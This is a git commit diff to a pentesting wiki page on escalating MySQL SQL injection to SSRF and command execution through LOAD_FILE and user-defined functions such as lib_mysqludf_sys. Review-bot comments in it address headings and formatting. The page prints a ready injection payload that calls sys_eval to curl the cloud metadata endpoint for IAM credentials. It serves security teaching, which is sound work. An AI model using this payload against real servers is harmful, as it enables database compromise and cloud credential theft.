GitBook: [#3584] No subject

CPol 2022-10-08 18:06:39 +00:00 committed by gitbook-bot
parent 5d7c86366f
commit d8ffc8fffb
No known key found for this signature in database
GPG Key ID: 07D2180C7B12D0FF
2 changed files with 7 additions and 7 deletions


@ -521,7 +521,7 @@
* [MS Access SQL Injection](pentesting-web/sql-injection/ms-access-sql-injection.md)
* [MSSQL Injection](pentesting-web/sql-injection/mssql-injection.md)
* [MySQL injection](pentesting-web/sql-injection/mysql-injection/README.md)
* [Mysql File priv to SSRF/RCE](pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md)
* [MySQL File priv to SSRF/RCE](pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md)
* [Oracle injection](pentesting-web/sql-injection/oracle-injection.md)
* [PostgreSQL injection](pentesting-web/sql-injection/postgresql-injection/README.md)
* [dblink/lo\_import data exfiltration](pentesting-web/sql-injection/postgresql-injection/dblink-lo\_import-data-exfiltration.md)


@ -1,4 +1,4 @@
# Mysql File priv to SSRF/RCE
# MySQL File priv to SSRF/RCE
<details>
@ -14,7 +14,7 @@
**Post copied from** [**https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/#mysqlmariadbpercona**](https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/#mysqlmariadbpercona)
### Using LOAD\_FILE/LOAD DATA/LOAD XML
### LOAD\_FILE/LOAD DATA/LOAD XML to SSRF
Every SQL Out of Band data exfiltration article will use the `LOAD_FILE()` string function to make a network request. The function itself has its own limitations based on the operating system it is run on and the settings with which the database was started.
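Review bot: renaming the heading from "Using LOAD\_FILE/LOAD DATA/LOAD XML" to "LOAD\_FILE/LOAD DATA/LOAD XML to SSRF" changes the anchor generated for this section, so any link that targets the old heading fragment will stop resolving. Search the repository for links to the old fragment and update them in the same commit.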
@ -30,13 +30,13 @@ This Server Side Request Forgery, although useful, is restricted to only TCP por
![](https://ibreak.software/img/using-sql-injection-to-perform-ssrf-xspa-attacks/3.png)
### Using User Defined Functions
### User Defined Functions to RCE
Another cool technique with MySQL databases is the ability to use User Defined Functions (UDF) present in external library files that if present in specific locations or system $PATH then can be accessed from within MySQL.
You could use a SQL Injection to write a library (`.so` or `.dll` depending on Linux or Windows), containing a User Defined Function that can make network/HTTP requests, that can be then invoked through additional queries.
You could use a SQL Injection to **write a library (`.so` or `.dll`** depending on Linux or Windows), containing a User Defined Function that can make network/HTTP requests, that can be then invoked through additional queries.
This has its own set of restrictions though. Based on the version of MySQL, which you can identify with `select @@version`, the directory where plugins can be loaded from is restricted. MySQL below `v5.0.67` allowed for library files to be loaded from system path if the `plugin_dir` variable was not set. This has changed now and newer versions have the `plugin_dir` variable set to something like `/usr/lib/mysql/plugin/`, which is usually owned by root.
This has its own set of restrictions though. Based on the version of MySQL, which you can identify with `select @@version`, the directory where plugins can be loaded from is restricted. MySQL below `v5.0.67` allowed for library files to be loaded from system path if the `plugin_dir` variable was not set. This has changed now and newer versions have the **`plugin_dir`** variable set to something like `/usr/lib/mysql/plugin/`, which is usually owned by root.
Basically **for you to load a custom library into MySQL and call a function from the loaded library via SQL Injection, you would need**:
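Review bot: the new heading "User Defined Functions to RCE" promises command execution, but the paragraph under it still describes the UDF only as one "that can make network/HTTP requests"; either keep SSRF in the heading or add a sentence saying what makes this RCE. In the same hunk, the bold span in "**write a library (`.so` or `.dll`** depending on Linux or Windows)" closes inside the parenthetical, so the emphasis ends mid-bracket; close it after "library" or after the closing parenthesis.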
@ -44,7 +44,7 @@ Basically **for you to load a custom library into MySQL and call a function from
* **`file_priv`** set to **`Y`** in `mysql.user` for the current database user
* **`secure_file_priv`** set to **`""`** so that you can read the raw bytes of the library from an arbitrary location like the network or a file uploads directory in a web application.
Assuming the above conditions are met, you can use the classical approach of transferring the [popular MySQL UDF `lib_mysqludf_sys` library](https://github.com/mysqludf/lib\_mysqludf\_sys) to the database server. You would then be able to make operating system command requests like `cURL` or `powershell wget` to perform SSRF using the syntax
Assuming the above conditions are met, you can use the **classical approach of transferring the** [**popular MySQL UDF `lib_mysqludf_sys` library**](https://github.com/mysqludf/lib\_mysqludf\_sys) **to the database server**. You would then be able to make operating system command requests like `cURL` or `powershell wget` to perform SSRF using the syntax
`x'; SELECT sys_eval('curl http://169.254.169.254/latest/meta-data/iam/security-credentials/'); -- //`
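Review bot: the reworked sentence is now bold in three separate spans that cover almost the whole first clause, which leaves nothing emphasised relative to the rest; bolding only the library name inside the link would be enough. The sentence also still ends "to perform SSRF using the syntax" with the payload on a detached inline-code line, so a colon after "syntax" would tie the two together.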